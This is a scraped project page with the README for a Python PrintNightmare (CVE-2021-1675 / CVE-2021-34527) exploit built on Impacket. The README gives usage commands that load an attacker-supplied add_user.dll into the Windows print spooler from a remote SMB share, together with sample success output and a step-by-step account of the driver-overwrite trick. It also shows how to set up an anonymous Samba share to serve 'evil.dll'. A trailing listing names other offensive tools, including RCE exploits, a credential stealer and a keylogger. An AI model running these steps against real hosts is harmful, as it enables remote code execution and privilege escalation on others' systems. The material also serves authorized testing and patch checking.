Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

Overview

PrintNightmare

Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

Installtion

$ pip3 install impacket

Usage

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: printnightmare.py [-h] [-debug] [-port [destination port]] [-target-ip ip address] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                         [-name driver name] [-env driver name] [-path driver path] [-dll driver dll] [-check] [-list] [-delete]
                         target

PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

positional arguments:
  target                [[domain/]username[:password]@]
   
    

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -port [destination port]
                        Destination port to connect to MS-RPRN named pipe
  -target-ip ip address
                        IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

driver:
  -name driver name     Name for driver
  -env driver name      Environment for driver
  -path driver path     Driver path for driver
  -dll driver dll       Path to DLL

modes:
  -check                Check if target is vulnerable
  -list                 List existing printer drivers
  -delete               Deletes printer driver

   

Examples

Exploitation

Remote DLL
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
[*] Successfully loaded DLL
Local DLL
$ ./printnightmare.py -dll 'C:\Windows\System32\spool\drivers\x64\3\old\1\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\add_user.dll'
[*] Loading DLL
[*] Successfully loaded DLL

Notice that the local DLL example doesn't abuse CVE-2021-34527 to copy over the DLL.

Custom name
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' -name 'My Printer Driver' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'My Printer Driver'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
[*] Successfully loaded DLL

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
Name:               Microsoft XPS Document Writer v4
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_f340cb58fcd23202\MXDW.gpd
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft Print To PDF
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_80184dcbef6775bc\MPDW-PDC.xml
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               My Printer Driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
Version:            3
----------------------------------------------------------------
Name:               Microsoft Shared Fax Driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSDRV.DLL
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
Version:            3
----------------------------------------------------------------
Name:               Microsoft enhanced Point and Print compatibility driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
Version:            3
----------------------------------------------------------------

Check if target is vulnerable

Unpatched Windows 10
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Target appears to be vulnerable!
Patched Windows Server 2022
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[!] Target does not appear to be vulnerable

List current printer drivers

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
Name:               Microsoft XPS Document Writer v4
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc7809b71930efc\MXDW.gpd
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft Print To PDF
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_6dc3549941ff1a57\MPDW-PDC.xml
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft enhanced Point and Print compatibility driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
Version:            3
----------------------------------------------------------------

Delete printer driver

May require administrative privileges.

$ ./printnightmare.py -delete -name 'Microsoft XPS Document Writer v5' 'administrator:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Deleted printer driver!

Details

PrintNightmare consists of two CVE's, CVE-2021-1675 / CVE-2021-34527.

CVE-2021-1675

A non-administrative user is allowed to add a new printer driver. This vulnerability was fixed by only allowing administrators to add new printer drivers. A patched version of the print spooler will return RPC_E_ACCESS_DENIED (Code: 0x8001011b) if a non-administrator tries to add a new printer driver.

CVE-2021-34527

When adding a new printer driver, the pDataFile parameter in the DRIVER_CONTAINER allows UNC paths. The DLL specified in pDataFile will however not be loaded, but it will get copied over to a local path allowing us to create a new printer driver with the pConfigFile parameter pointing to the local path which will load the DLL. A patched version of the printer spooler will return ERROR_INVALID_PARAMETER (Code: 0x57)

Combining the pieces

Only CVE-2021-1675 is needed if the malicious DLL is already located on the target.

For PrintNightmare, if the DLL is not a local path, then CVE-2021-34527 can be used to fetch the DLL via UNC paths. For that reason, it is necessary to serve the DLL over SMB. If you're not familiar with SMB and UNC, read the following subsection.

When creating a new printer driver, the DLL in the pDataFile parameter will not be loaded for security reasons. However, it will be copied over to C:\Windows\system32\spool\drivers\x64\3\. Then, we could create a new printer driver that uses pConfigFile (which will load the DLL) with the local path. However, the DLL is in use by the first printer driver when creating the second printer driver. Instead, we could overwrite the first printer driver, which will make the printer driver's DLLs get copied over to C:\Windows\system32\spool\drivers\x64\3\old\\, where is incremented for each DLL. Now we can create a third printer driver that will use the local path C:\Windows\system32\spool\drivers\x64\3\old\\, since the DLL is no longer used. Now it's just a matter of guessing which will start incrementing from 1.

Note that the DLL will keep its filename locally, so if you initially run the exploit with foo.dll and it gets saved to C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll and you then change the contents of foo.dll locally and run the exploit again and it now gets saved to C:\Windows\system32\spool\drivers\x64\3\old\5\foo.dll, then the original foo.dll will be used since it is located in C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll. Instead, simply change the filename if you change the contents of the DLL.

SMB and UNC

In short, a UNC path is a path to a file or folder on a network rather than a local file, and it contains the server name and path. For instance, the UNC path \\10.0.0.2\files\foo.txt is a file foo.txt that is served from the files share of the server 10.0.0.2. Usually, a share is served over SMB, but WebDAV is also supported. To create an SMB share on Linux, the easiest and most reliable way is to use the Samba package.

To install Samba with apt:

$ sudo apt install samba

Edit the /etc/samba/smb.conf and add the following at the end of the file:

[smb]
    comment = Samba
    path = /tmp/share
    guest ok = yes
    read only = yes
    browsable = yes
    force user = nobody

This will create a new share called smb and serve the files inside /tmp/share. It allows for anonymous access, and the local user nobody will be used to browse the files.

Then start the Samba service by doing:

$ sudo service smbd start

Suppose your Linux machine has the IP 192.168.1.100 and you wish to serve the evil.dll, then the UNC path in this scenario will be \\192.168.1.100\smb\evil.dll.

Authors

Credits

Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
Scan your logs for CVE-2021-44228 related activity and report the attackers

jndiRep - CVE-2021-44228 Basically a bad grep on even worse drugs. search for malicious strings decode payloads print results to stdout or file report

js-on 2 Nov 24, 2022
A collection of intelligence about Log4Shell and its exploitation activity

Log4Shell-IOCs Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell ex

Curated Intel 172 Nov 17, 2022
Denial Attacks by Various Methods

Denial Service Attack Denial Attacks by Various Methods IIIIIIIIIIIIIIIIIIII PPPPPPPPPPPPPPPPP VVVVVVVV VVVVVVVV I::

Baris Dincer 9 Nov 26, 2022
A compact version of EDI-Vetter, which uses the TLS output to quickly vet transit signals.

A compact version of EDI-Vetter, which uses the TLS output to quickly vet transit signals. All your favorite hits in a simplified format.

Jon Zink 2 Aug 03, 2022
Receive notifications/alerts on the most recent disclosed CVE's.

Receive notifications on the most recent disclosed CVE's.

Ameliorate 7 Nov 24, 2022
Gitlab RCE - Remote Code Execution

Gitlab RCE - Remote Code Execution RCE for old gitlab version = 11.4.7 & 12.4.0-12.8.1 LFI for old gitlab versions 10.4 - 12.8.1 This is an exploit f

153 Nov 09, 2022
Fetch Chrome, Firefox, WiFi password and system info

DISCLAIMER : OUR TOOLS ARE FOR EDUCATIONAL PURPOSES ONLY. DON'T USE THEM FOR ILLEGAL ACTIVITIES. YOU ARE THE ONLY RESPONSABLE FOR YOUR ACTIONS! OUR TO

Genos 59 Nov 17, 2022
AIL LeakFeeder: A Module for AIL Framework that automate the process to feed leaked files automatically to AIL

AIL LeakFeeder: A Module for AIL Framework that automates the process to feed leaked files automatically to AIL, So basically this feeder will help you ingest AIL with your leaked files automatically

ail project 8 May 03, 2022
CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection Usage usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell] CVE-2021-2

r0cky 92 Jul 20, 2022
CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.

CVE-2021-43936 CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware. This vulnerability w

Jeremiasz Pluta 8 Jul 05, 2022
Bilgi Sistemleri Projesi için yapılan keylogger

Keylogger Bilgi Sistemleri Projesi için yapılan keylogger Projede kullanılan kütüphanelere sahip olmasanız da python dosyası çalıştığında kendisi gere

Tarik Bulut 1 Jan 07, 2022
WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities

WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities Which is a great tool for web pentesters. Coded in python3, CLI. WebScan is capable of scanni

AnonyminHack5 12 Dec 02, 2022
An Advanced Local Network IP Scanner, made in python of course!

██╗██████╗    ██████╗ █████╗ █████╗ ███╗ ██╗███╗ ██╗███████╗██████╗ ██║██╔══██╗  ██╔════╝██╔══██╗██╔══██╗████╗ ██║████╗ ██║██╔════╝██╔══██

Polsulpicien 2 Dec 18, 2021
CodeTest信息收集和漏洞利用工具

CodeTest信息收集和漏洞利用工具,可在进行渗透测试之时方便利用相关信息收集脚本进行信息的获取和验证工作,漏洞利用模块可选择需要测试的漏洞模块,或者选择所有模块测试,包含CVE-2020-14882, CVE-2020-2555等,可自己收集脚本后按照模板进行修改。

23 Mar 18, 2021
Some Attacks of Exchange SSRF ProxyLogon&ProxyShell

Some Attacks of Exchange SSRF This project is heavily replicated in ProxyShell, NtlmRelayToEWS https://mp.weixin.qq.com/s/GFcEKA48bPWsezNdVcrWag Get 1

Jumbo 129 Dec 30, 2022
Deobfuscate Log4Shell payloads with ease

Ox4Shell Deobfuscate Log4Shell payloads with ease. Description Since the release

Oxeye 137 Jan 02, 2023
Caretaker 2 Jun 06, 2022
This is the fuzzer I made to fuzz Preview on macOS and iOS like 8years back when I just started fuzzing things.

Fuzzing PDFs like its 1990s This is the fuzzer I made to fuzz Preview on macOS and iOS like 8years back when I just started fuzzing things. Some discl

Chaithu 14 Sep 30, 2022
IDA Python Script for anti ollvm

IDA Python Script for anti ollvm

Shocker 62 Dec 23, 2022
labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface

labsecurity labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface. Warning

Dylan Meca 16 Dec 08, 2022